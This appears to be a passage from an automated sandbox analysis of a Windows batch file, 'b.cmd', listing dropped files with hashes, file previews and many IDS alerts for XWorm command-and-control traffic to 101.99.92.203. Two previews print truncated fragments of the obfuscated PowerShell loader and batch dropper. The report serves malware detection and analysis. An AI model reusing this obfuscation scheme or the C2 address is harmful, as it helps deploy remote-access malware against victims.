Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2832
Entropy (8bit):	5.414030276061799
Encrypted:	false
SSDEEP:	48:0AzsSU4y4RQmFoUeCamfm9qr9t5/78NV4GxJZKaVEouYAgwd64rHLjtvz:0AzlHyIFKL2O9qrh7KrJ5Eo9Adrxz
MD5:	C3CCD80280C787F6D85E19A6DEF1CB5A
SHA1:	DB0C3BC59CFCDA67F05BCB8E2711871A1D806A9F
SHA-256:	53519FEA01AFDB161253AE215A668C729AACC17A9E1073D74C5CE421BA9C37CC
SHA-512:	64D376AA8B657F95FEE06AC0827205141F91D8D99B205D527FD35C987710328A897CF832683AD14181535D1740AE45CD1DC24878BC840E8E6B9D7AE2B3118A1F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e...........................................................H..............@-....f.J.\|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ojf2mp0.mqs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_laz5iitu.x1c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scsfgjn1.nho.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xaksudmg.0xf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (2117), with CRLF line terminators
Category:	dropped
Size (bytes):	2119
Entropy (8bit):	5.753376599703792
Encrypted:	false
SSDEEP:	48:/7/FBLdW7HJPHR/RrRxTB//TdB/aU0QlkAk5OHX5VkFn6EvJDE6tVWM:/r5MpPHRp7TBDdBBXyOHX5VkFzRA6z
MD5:	C3128B9E9835E445C18C309D82D13595
SHA1:	A474EB8DA77489439B2F0302625BBE36E7CE99A2
SHA-256:	F9C20E6FA052BC93BE8C8084D0C65F09A0CC84160BEDD39949B3FC352D8B582B
SHA-512:	8FF9499C6EBC1351C64FF6341CEF13FDFDA593781436E7E560ADB8F049FDEA1C28C4F1452BEF5BF1BE073EFDA29D4DCF6300AB3C526D27F823FC9926B24779EC
Malicious:	false
Preview:	$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.Ciphe

Static File Info

General

File type:	ASCII text, with very long lines (29358), with CRLF line terminators
Entropy (8bit):	5.995955153894766
TrID:
File name:	b.cmd
File size:	66'934 bytes
MD5:	22f8f4191985b660d43620eb8d56dc57
SHA1:	f44ff1478083e15c97231eafc098af44f728aa02
SHA256:	91867f295ac459c82807864841770842cd2f4b254af3f3eb36c74438dff2c8a0
SHA512:	7d934b3c86cdb487f6c57cc3c4ccfc6153653cf15f8f9f97cf263f5cbecb157c2af575b1eae0b08e7196e9d49d54b3cb66b772346a8eea22fcc83951367bee1b
SSDEEP:	1536:PBnkusrR0DF85ky0AAVubrIRpYuUInxRZjsC:Jkus10R8Cr6iyYRZjsC
TLSH:	5963E0020E5DDA6A4F571725B2DB2D4F5EC8DECE894D454330588D3DF1EFA4987228E8
File Content Preview:	start /min /b cmd /c \"set __=^&rem\..set "bXhDSGlv=sejTLcctjTLcc jTLccbkjTLcchSZjTLccA=jTLcc==1jTLcc &jTLcc& jTLccstjTLccajTLccrjTLcctjTLcc jTLcc"jTLcc"jTLcc /mjTLccinjTLcc jTLcc"..set "aUFFa0NB=&jTLcc& jTLccexijTLcctjTLcc"..set "dnp2VnFP=njTLccotjTLcc d

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-26T08:51:31.134592+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:51:31.380832+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:31.606047+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:51:41.905177+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:41.905177+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:46.067340+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:46.077208+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:00.757563+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:00.761855+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:11.907007+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:11.907007+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:15.438912+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:15.440755+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:18.469264+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:18.473454+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:20.187649+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:20.189371+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:23.631494+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:23.633999+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:28.870044+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:28.872153+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:29.360012+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:29.368529+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:30.430971+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:30.433021+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:33.993102+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:33.997377+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.133769+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:34.135697+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.184661+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.192609+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.242315+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:34.244152+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:41.908748+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:41.908748+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:43.392634+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:43.397341+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.169598+0200	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.236122+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.238238+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.361105+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.362969+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.422913+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.427220+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.491780+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.499829+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.747195+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.751256+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:49.733611+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:49.736759+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:50.921310+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:50.923858+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:53.999681+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:54.002242+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:54.880461+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:54.884005+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:55.053528+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:55.056128+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:59.966453+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:59.971039+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.028670+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.030487+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.045747+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.046992+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.076089+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.077688+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.083376+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.133615+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.163384+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.164856+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:03.091908+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:03.097657+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:10.278524+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:10.281806+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:11.887538+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:11.887538+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:20.601582+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:20.604015+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:25.684151+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:25.689628+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:30.913282+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:30.915218+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.030649+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.032233+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.147691+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.149558+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.336532+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.337967+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:32.476799+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:32.478538+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:33.961008+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:33.963068+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.616631+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.619425+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.734613+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.735834+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.854293+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.857389+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:41.995606+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:41.995606+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:42.503843+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:42.505494+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:42.632949+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:42.634493+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.741987+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.746689+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.859064+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.864194+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.943970+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.947376+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.960276+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.966537+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49732	101.99.92.203	7000	TCP
